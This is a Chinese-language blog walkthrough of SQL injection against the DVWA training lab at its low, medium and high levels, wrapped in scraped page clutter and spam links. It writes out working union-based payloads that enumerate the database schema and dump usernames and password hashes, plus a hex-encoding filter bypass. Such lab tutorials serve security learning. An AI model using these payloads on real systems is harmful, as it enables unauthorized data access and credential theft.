当前位置: 首页 > news >正文

外国做挂的网站是多少中国疫情最新情况

外国做挂的网站是多少,中国疫情最新情况,虎门营销型网站建设,十大编程教育培训机构这篇文章主要记录学习sql注入的过程中遇到的问题已经一点学习感悟,过程图片会比较多,比较基础和详细,不存在看不懂哪一步的过程 文章目录 靶场介绍SQL注入 lowSQL注入 MediumSQL注入 HighSQL注入 Impossible 靶场介绍 DVWA(Damn…

这篇文章主要记录学习sql注入的过程中遇到的问题已经一点学习感悟,过程图片会比较多,比较基础和详细,不存在看不懂哪一步的过程

文章目录

  • 靶场介绍
  • SQL注入 low
  • SQL注入 Medium
  • SQL注入 High
  • SQL注入 Impossible

靶场介绍

DVWA(Damn Vulnerable Web Application)是一个专为安全专业人员、开发人员和学生设计的网络安全靶场。它是一个基于PHP/MySQL的开源Web应用程序,模拟了一个典型的Web应用程序环境,并包含了多种常见的Web安全漏洞,如SQL注入、跨站脚本攻击(XSS)、文件上传漏洞、命令注入等。这些漏洞被故意设计出来,用于安全教育和渗透测试训练。

SQL注入 low

输入1,正常回显,观察URL明显是get请求传递的参数。
在这里插入图片描述

测试是否存在sql注入,这里用 ’ 来测(虽然这个是靶场,我们已经知道存在sql注入漏洞,我为了理清思路,这里完整的复述一遍)
在这里插入图片描述
这里报错了,说明这个网页存在sql注入的漏洞
在这里插入图片描述
测一下漏洞是字符型还是数字型

1 and 1=1
1 and 1=2
1' and 1=1#
1' and 1=2#
(有的地方用--+有的地方可以用--+注释,有的地方可以用#注释,这里只能用#注释)

前两个都正常回显
在这里插入图片描述
在这里插入图片描述
这里我们猜测一下数据库的搜索语句应该是这样的,那么应该是字符型
在这里插入图片描述
1’ and 1=1#正常回显
在这里插入图片描述

1’ and 1=2#回显异常了
在这里插入图片描述
这里我们接着想一想后端的sql搜索语句是怎么写的,如下图,当前面闭合后,执行后面的1=1,会正常回显内容,当你1=2时,永假,页面肯定回显异常。到这里就可以判断一定是字符型的注入了。
在这里插入图片描述
到这一步基本上我们找到了闭合,可以开始注入了。
ps:到了这儿,该如何注入就得看各位师父们的手法和技巧了,高超的技巧往往能更快更方便注入。

1' order by 
-1' union select 1,2#

这里的意思就是说联合注入,我们后面查询的1,2两个字段的数据显示在页面的哪个位置,搞清楚了位置我们就可以通过替换1,2字段的查询语句来进行数据库的信息的探测。
在这里插入图片描述
探测数据库名

 -1' union select database(),2#

在这里插入图片描述
探测表名

1' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

在这里插入图片描述
探测表中字段名

1' and 1=2 union select 1, group_concat(column_name) from information_schema.columns where table_name='users'#

在这里插入图片描述
获取数据(密码均为md5加密,各位可以去网上用md5解密网站跑,简单的一般不用收费)

1' and 1=2 union select user,password from users#

在这里插入图片描述
好了到此,low级别的sql注入已经差不多完成了,后面的中级和高级最后过程就不赘述,只寻找到闭合。

SQL注入 Medium

我们先观察一下页面,只能让你选择你的id,不让你输入了,使用post传参,我们可以用burp suite来抓包实现修改post数据
在这里插入图片描述
数据包如下:
在这里插入图片描述
分析到这里后,其实其他步骤跟low级别就差不多了

测有无sql漏洞:
id=1'&Submit=Submit测有无sql
判断类型:
id=1' and 1=1#&Submit=Submit
id=1' and 1=2#&Submit=Submit
id=1 or 1=1#&Submit=Submi

如此可以测出来,存在数字型的sql注入漏洞
在这里插入图片描述
测试代码如下:

id=1 and 1=1 order by 3&Submit=Submit
id=1 and 1=1 order by 2&Submit=Submit
id=1 union select 1,2&Submit=Submit
id=1 union select 1,database()#&Submit=Submit
id=1 union select 1,table_name from information_schema.tables where table_schema=database()#&Submit=Submit
id=1 union select 1,column_name from information_schema.columns where table_name='users'#&Submit=Submit

这里要就能体现,medium和low有什么区别了。我们探测user表中的字段数时,发现sql语句报错了,说明后端做了过滤。我们点开源代码看看后端做了什么限制。
在这里插入图片描述
说明他可能过滤掉了我们的单引号,但是这种过滤其实也没啥太大用处,毕竟换个十六进制加密就能写进去。

id=1 union select 1,column_name from information_schema.columns where table_name=0x5553455253#&Submit=Submit

在这里插入图片描述

id=1 or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #&Submit=Submit

在这里插入图片描述

SQL注入 High

这里我们先审一下后端的代码,这里做的限制只要是limit 1,给你一个回复,而且你提交数据的页面和它显示给你的界面不是同一个,这样做是防止sqlmap等自动化扫描工具的批量扫描。然而其他的跟low级别基本上差不太多。
在这里插入图片描述
我们直接用low级别的payload也可以直接获取到他的数据库信息。
在这里插入图片描述

SQL注入 Impossible

关于这个难度,本人的php水平有限,等后期php的水平提升了再来审一下这个靶场的后端代码,这里先搁置在这里。csdn中很有很多大佬做了代码审计,各位感兴趣可以自行搜索。(QAQ)

在这里插入图片描述

http://www.tj-hxxt.cn/news/49380.html

相关文章:

  • 做网站php都用什么框架网页设计模板免费网站
  • 深圳app客户端做网站app制作一个需要多少钱
  • 永兴县网站建设服务商淘宝店铺推广
  • 咨询网站模板网络开发
  • 制作网页与网站百度推广的方式
  • 视频推广平台有哪些百度网站排名seo
  • 临沂网站建设推广关键词seo深圳
  • 哪里有做投票的网站seo最好的工具
  • 网站建设江西有多少家近期新闻事件
  • 网站上线怎么做交换友链是什么意思
  • 用jquery做的书籍网站今日国内重大新闻
  • ftp上传wordpress网站要多久香蕉和忘忧草对焦虑的影响
  • 尖草坪网站建设营销软文推广平台
  • 静态网站转成动态网站bt蚂蚁磁力搜索天堂
  • 中国白客网vip钓鱼网站开发泉州seo优化
  • 单页营销型网站模板网络营销案例2022
  • 网站建设找谁做百度网盘电脑版下载
  • 做宝宝衣服的网站域名检测查询
  • 网站开发不用java吗浏览器打开是2345网址导航
  • 哪里有网站源文件下载品牌推广运营策划方案
  • wordpress网上在线插件上海seo公司哪家好
  • 四川遂宁做网站的公司东莞百度seo电话
  • 高端汽车网站建设公司网站模版
  • 各大搜索引擎提交网站入口大全网络营销策略有哪五种
  • 多个网站域名 是新增接入他达拉非
  • 唐山网站从哪里找口碑营销
  • 四川聚锋建设工程有限公司官方网站四川seo整站优化
  • 羊肉口报关做网站百度推广登录入口登录
  • 吉林企业建站系统费用seo关键词怎么优化
  • 外贸福步论坛官网佛山seo优化外包